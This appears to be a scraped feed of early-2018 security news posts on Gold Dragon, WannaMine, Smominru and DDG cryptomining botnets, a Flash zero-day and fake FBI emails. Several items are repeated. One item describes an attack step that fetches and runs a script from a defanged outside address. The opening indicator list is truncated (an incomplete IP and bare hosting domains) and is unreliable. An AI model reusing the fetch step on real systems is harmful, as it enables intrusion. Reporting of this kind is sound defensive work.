The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

 

Indicators of Compromise

IPs

  • 194.70.136

Domains

  • 000webhostapp.com
  • 000webhostapp.com
  • 000webhostapp.com
  • nid-help-pchange.atwebpages.com
  • inkboom.co.kr
  • byethost7.com

Hashes

  • fef671c13039df24e1606d5fdc65c92fbc1578d9
  • 06948ab527ae415f32ed4b0f0d70be4a86b364a5
  • 96a2fda8f26018724c86b275fe9396e24b26ec9e
  • ad08a60dc511d9b69e584c1310dbd6039acffa0d
  • c2f01355880cd9dfeef75cff189f4a8af421e0d3
  • 615447f458463dc77f7ae3b0a4ad20ca2303027a
  • bf21667e4b48b8857020ba455531c9c4f2560740
  • bc6cb78e20cb20285149d55563f6fdcf4aaafa58
  • 465d48ae849bbd6505263f3323e818ccb501ba88
  • a9eb9a1734bb84bbc60df38d4a1e02a870962857
  • 539acd9145befd7e670fe826c248766f46f0d041
  • d63c7d7305a8b2184fff3b0941e596f09287aa66
  • 35e5310b6183469f4995b7cd4f795da8459087a4
  • 11a38a9d23193d9582d02ab0eae767c3933066ec
  • e68f43ecb03330ff0420047b61933583b4144585
  • 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
  • 3a0c617d17e7f819775e48f7edefe9af84a1446b
  • 761b0690cd86fb472738b6dc32661ace5cf18893
  • 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
  • 5e1326dd7122e2e2aed04ca4de180d16686853a7
  • 6e13875449beb00884e07a38d0dd2a73afe38283
  • 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
  • 389db34c3a37fd288e92463302629aa48be06e35
  • 71f337dc65459027f4ab26198270368f68d7ae77
  • 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

 

 

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit

WannaMine Malware That Uses NSA Exploit To Mine Cryptocurrencies Is On The Rise

The recent months have seen an increase in cyberattacks using cryptocurrency-mining tools, which has now become one of the main security threats.

In April last year, the ‘EternalBlue’ exploit, formerly owned by the US National Security Agency (NSA), was leaked to the public by hacking group Shadow Brokers. This exploit was then used as a base in the WannaCry virus that infected more than 230,000 computers running the Microsoft Windows operating system in 150 countries in May 2017.

Now, researchers at CrowdStrike, a cybersecurity company, have discovered a new strain of malware that uses the ‘EternalBlue’ exploit, to hijack victims’ computers and CPU processing power to secretly mine cryptocurrency in a new attack dubbed WannaMine.

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors,” the researchers said in a blog post published on January 25.

“WannaMine employs ‘living off the land’ techniques such as Windows Management Instrumentation (WMI) permanent event subscriptions as a persistence mechanism. It also propagates via the EternalBlue exploit popularized by WannaCry.”

This WannaMine malware is quite similar to the one detected by Panda Security in October last year, which was also based on EternalBlue exploit and used by the infected computer to undermine Monero, in that case.

According to the new report, WannaMine can infect a computer in several ways, such as clicking a malicious link in an email or website, or through remote access attack on the victim. In most cases, the victim will not notice anything, except that the computer runs slower.

This malware is complex to attack for companies, as it does not need to download any type of file to infect the computer. Since WannaMine is a fileless operation and uses legitimate system software system software such as WMI and PowerShell to run, it makes it nearly impossible for organizations to detect and block it without some form of next-generation antivirus. However, WannaMine doesn’t immediately look to force the EternalBlue exploit.

It first uses a tool called “MimiKatz” to recover logins and passwords from system memory and try to infiltrate the system once. If that fails, WannaMine turns to the EternalBlue exploit to complete the task and break in.

Once the attack is successful, WannaMine quietly uses the CPU processing power to generate Monero coins in the background. “The WannaMine worm uses advanced techniques to maintain persistence within an infected network and move laterally from system to system,” the researchers said. “In one case, a client informed CrowdStrike that nearly 100% of its environment was rendered unusable due to overutilisation of systems’ CPUs.”

According to CrowdStrike specialists, the number of attacks has increased sharply since the beginning of 2018, and one can expect to see much more cryptomining activity in the coming months, resulting in business disruptions and downtime.

The post WannaMine: Cryptocurrency Mining Malware That Uses An NSA Exploit appeared first on TechWorm.

Ransomware’s difficult second album

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Ransomware drop

Click to enlarge

Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

FAQ

Click to enlarge

Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

Get in the bin

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks 2017, advances in security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

mining

Click to enlarge

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

fake fonts

Click to enlarge

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Signed Malware

Stuxnet famously used legitimate digital certificates to sign its malware. A research paper from last year found that the practice is much more common than previously thought.

Now, researchers have presented proof that digitally signed malware is much more common than previously believed. What's more, it predated Stuxnet, with the first known instance occurring in 2003. The researchers said they found 189 malware samples bearing valid digital signatures that were created using compromised certificates issued by recognized certificate authorities and used to sign legitimate software. In total, 109 of those abused certificates remain valid. The researchers, who presented their findings Wednesday at the ACM Conference on Computer and Communications Security, found another 136 malware samples signed by legitimate CA-issued certificates, although the signatures were malformed.

The results are significant because digitally signed software is often able to bypass User Account Control and other Windows measures designed to prevent malicious code from being installed. Forged signatures also represent a significant breach of trust because certificates provide what's supposed to be an unassailable assurance to end users that the software was developed by the company named in the certificate and hasn't been modified by anyone else. The forgeries also allow malware to evade antivirus protections. Surprisingly, weaknesses in the majority of available AV programs prevented them from detecting known malware that was digitally signed even though the signatures weren't valid.

Scammers Impersonating the FBI’s IC3 to Distribute Malware, Steal PII

Scammers are impersonating the FBI’s Internet Crime Complaint Center (IC3) in order to infect users with malware and/or steal their personally identifiable information (PII). On 1 February, the real IC3 issued a public service announcement warning users of three scams that are impersonating the multi-agency task force. Here’s the FBI on the first ruse, for […]… Read More

The post Scammers Impersonating the FBI’s IC3 to Distribute Malware, Steal PII appeared first on The State of Security.

DDG, the second largest mining botnet targets Redis and OrientDB servers

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet of ever, that targets Redis and OrientDB servers.

A new Monero-mining botnet dubbed DDG was spotted in the wild, the malware targets Redis and OrientDB servers.

According to the researchers at Qihoo 360’s Netlab, the DDG botnet was first detected in 2016 and is continuously updated throughout 2017.

“Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it DDG.Mining.Botnet after its core function module name DDG.” reads the analysis published by Netlab.

The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017, DDG is among the largest mining botnets.

Yesterday I wrote about the greatest mining botnet called Smominru that has infected over 526,000 Windows machines, its operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

The malware exploits the remote code execution vulnerability CVE-2017-11467 to compromise OrientDB databases and targets Redis servers via a brute-force attack.

Crooks are focusing their efforts on attacks against servers that usually have significant computing capabilities.

The attack chain described by the researchers from Qihoo 360’s Netlab is composed of the following steps:

  • Initial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops the attack payload
  • Stage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp: //218.248.40.228:8443/i.sh) on the primary server and keep it synchronized every 5 minutes
  • Stage 2: DDG traverses the built-in file hub_iplist.txt, check the connectivity of every single entry and try to download the corresponding Miner program wnTKYg from the one can be successfully connected (wnTKYg.noaes if the native CPU does not support AES-NI)
  • Mining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining for the attacker’s wallet.

The following image shows the DDG Mining Botnet attack process:

DDG botnet

The researchers conducted sinkholing of the botnet traffic and observed 4,391 IP addresses of compromised servers from all countries. Most of the infections is in China (73%), followed by the United States (11%), the botnet is mainly composed of compromised Redis databases (88%).

Cybercriminals are using three wallet addresses, the botnet mined 3,395 Monero ($925,000), but researchers also discovered another wallet containing 2,428 Monero ($660,000).

“The total income is Monroe 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is an issue for the second wallet, where “Total Paid” is not consistent with the summary of all tractions’ amount. We cannot confirm which number is more accurate, so we show both numbers here.” continues the analysis.

Further information including the IoCs are included in the technical report published by Qihoo 360’s Netlab.

 

Pierluigi Paganini

(Security Affairs – DDG botnet, mining)

The post DDG, the second largest mining botnet targets Redis and OrientDB servers appeared first on Security Affairs.

Watch out, cyber criminals are using fake FBI emails to infect your computer

The FBI Internet Crime Complaint Center (IC3) is warning of a new malware campaign aimed at infecting victims with weaponized attachments.

The Feds’ Internet Crime Complaint Center (IC3) is warning of a new spam campaign aimed at infecting victims with a ransomware. According to an alert issued on Wednesday by the IC3, numerous citizens filled complaints after received emails purporting to be from IC3. The message pretends to be the compensation from a cyber attack and asks the victims to fill the attached document, but the file is laced with malware.

The story is interesting, the email reports that a Nigerian cyber criminal had been arrested and feds have found the recipient’s email address of the alleged scammer’s PC. The email asks victims to return the document with recipient info and wait for the refund to arrive. Once the victim has opened the document, the infection process will start.

FBI

The FBI has identified at least three other versions of the IC3 impersonation scam:

  • “The first involved a fake IC3 social media page, which advertised itself as the FBI Cyber Crime Department (IC3) and requested recipients provide personal information in order to report an internet crime.” states the alert issued by the FBI. “
  • “The second involved an email which stated the recipient was treated unfairly by various banks and courier companies. The email claimed the recipient’s name was found in a financial company’s database and that they will be compensated for this unfair treatment.”
  • “The third example involved an email from the Internet Crime Investigation Center/Cyber Division and provided an address in Minneapolis, Minnesota. The email also included a case reference number in the subject line. The email informed the recipient that their IP address was referred to the IC3 as a possible victim of a federal cyber-crime. The email then requests the recipient to contact the sender via telephone.”

FBI is currently investigating the cases, victims of an online scam can file a complaint with the IC3 at www.ic3.gov.

 

Pierluigi Paganini

(Security Affairs – FBI, malware)

The post Watch out, cyber criminals are using fake FBI emails to infect your computer appeared first on Security Affairs.

South Korea Warns of Flash Zero-Day flaw exploited by North Korea in surgical attacks

South Korea’s Internet & Security Agency (KISA) is warning of a Flash zero-day vulnerability that has reportedly been exploited in attacks by North Korea’s hackers.

According to the alert published by the KISA, the vulnerability affects the latest Flash Player version 28.0.0.137 and earlier.

The zero-day vulnerability could be exploited by an attack by tricking victims into opening a document, web page or email containing a specially crafted Flash file.

“A zero-day vulnerability has been found in Adobe Flash Player. An attacker may be able to convince a user to open a Microsoft Office document, web page, or spam mail containing a Flash file,” reads the advisory published by the Korean CERT.

According to the researcher Simon Choi the Flash Player zero-day has been exploited by North Korea since mid-November 2017. The attackers exploited the zero-day vulnerability in attacks aimed at South Korean individuals involved in research activity on North Korea.

Hackers exploited the vulnerability to deliver a malware, in the image shared by Choi on Twitter shows that the exploit has been delivered via malicious Microsoft Excel files.

According to Adobe, the flaw is a critical use-after-free that allows remote code execution that received the code CVE-2018-4878.

The zero-day has been exploited in limited, surgical attacks against Windows users, Adobe plans to release a security update for the next week.

“A critical vulnerability (CVE-2018-4878) exists in Adobe Flash Player 28.0.0.137 and earlier versions. Successful exploitation could potentially allow an attacker to take control of the affected system.” reads the security advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.”

Flash zero-day

Waiting for the security updates, users should implement mitigations.

“Beginning with Flash Player 27, administrators have the ability to change Flash Player’s behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content,” Adobe suggests. “Administrators may also consider implementing Protected View for Office. Protected View opens a file marked as potentially unsafe in Read-only mode.”

 

Pierluigi Paganini

(Security Affairs – Flash Zero-Day, North Korea)

The post South Korea Warns of Flash Zero-Day flaw exploited by North Korea in surgical attacks appeared first on Security Affairs.

Google booted 100,000 malicious developers from Google Play

New malware and unwanted apps are discovered on Google Play nearly every day – or so it seems. According to Google’s statistics, in 2017 the company has taken down more than 700,000 apps that violated the Google Play policies: copycat apps, apps showing inappropriate content, and outright malware (apps that conduct SMS fraud, act as trojans, or phishing user’s information). The number might seem small to some and significant to others, but it is definitely … More

WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks experts discovered that there were at least other 3 different groups have been leveraging the NSA EternalBlue exploit,

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike. 

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless that was first reported by researchers at Panda Security.

WannaMine

The malicious code implements so-called “living off the land” techniques to gain persistence on the infected system leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription that would execute every 90 minutes a PowerShell command located in the Event Consumer.

Experts noticed that the malware uses credential harvester Mimikatz to collect users’ credentials that could be used for lateral movements. It also relies on the EternalBlue exploit in case it is not able to move laterally with the above technique.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine would degrade the performance of the infected machines, in case of laptops the malicious code could cause damages if it runs continuously for several hours.

Sophos experts published an interesting post containing Q&A on WannaMine.

 

Pierluigi Paganini

(Security Affairs – WannaMine , cryptocurrency miner)

The post WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit appeared first on Security Affairs.

Security Affairs: WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit

Researchers from security firm CrowdStrike spotted a new Monero crypto-mining worm dubbed WannaMine that spreads leveraging the NSA-linked EternalBlue exploit.

This morning I wrote about the Smominru botnet that used NSA exploit to infect more than 526,000 systems, and I explained that other threat actors are using similar techniques to mine cryptocurrency.

This is the case of a strain of the Monero crypto-mining worm dubbed WannaMine that spreads leveraging the EternalBlue exploit.

ETERNALBLUE is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack, it targets the SMBv1 protocol and has become widely adopted in the community of malware developers.

In June, following the WannaCry attacks experts discovered that there were at least other 3 different groups have been leveraging the NSA EternalBlue exploit,

Back to the present, WannaMine was developed to mine the Monero cryptocurrency abusing victims’ resources. According to security researchers at CrowdStrike, the malicious code is very sophisticated, it implements a spreading mechanism and persistence model similar to those used by state-sponsored APT groups.

“CrowdStrike has recently seen several cases where mining has impacted business operations, rendering some companies unable to operate for days and weeks at a time. The tools have caused systems and applications to crash due to such high CPU utilization speeds.” reads the analysis published by CrowdStrike. 

“CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and propagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent CrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur the lines between nation-state and eCrime tactics.”

WannaMine is a fileless that was first reported by researchers at Panda Security.

WannaMine

The malicious code implements so-called “living off the land” techniques to gain persistence on the infected system leveraging Windows Management Instrumentation (WMI) permanent event subscriptions. WannaMine registers a permanent event subscription that would execute every 90 minutes a PowerShell command located in the Event Consumer.

Experts noticed that the malware uses credential harvester Mimikatz to collect users’ credentials that could be used for lateral movements. It also relies on the EternalBlue exploit in case it is not able to move laterally with the above technique.

WannaMine is able to infect systems running all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003.

“While the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of sophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and eCrime threat actors. CrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected,” CrowdStrike concluded.

WannaMine would degrade the performance of the infected machines, in case of laptops the malicious code could cause damages if it runs continuously for several hours.

Sophos experts published an interesting post containing Q&A on WannaMine.

 

Pierluigi Paganini

(Security Affairs – WannaMine , cryptocurrency miner)

The post WannaMine, the sophisticated crypto miner that spreads via NSA EternalBlue exploit appeared first on Security Affairs.



Security Affairs

Massive Smominru Cryptocurrency Botnet Rakes In Millions

Researchers say Smominru threat actors are in control of 500,000 node botnet and earning $8,500 daily mining for Monero cryptocurrency.

The State of Security: Smominru! Half a million PCs hit by cryptomining botnet

Why go to all the bother of writing ransomware that demands victims pay a Bitcoin ransom? If all you want is cryptocurrency, why not use the infected computers to mine the crypto coins themselves?

The post Smominru! Half a million PCs hit by cryptomining botnet appeared first on The State of Security.



The State of Security

Smominru! Half a million PCs hit by cryptomining botnet

Why go to all the bother of writing ransomware that demands victims pay a Bitcoin ransom? If all you want is cryptocurrency, why not use the infected computers to mine the crypto coins themselves?

The post Smominru! Half a million PCs hit by cryptomining botnet appeared first on The State of Security.

Smashing Security #063: Carole’s back!

Ss episode 63 thumb

Fitness trackers breaching your privacy, how anyone can create convincing celebrity porn, and how ransomware authors are getting ripped off by scammers.

All this and much much more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.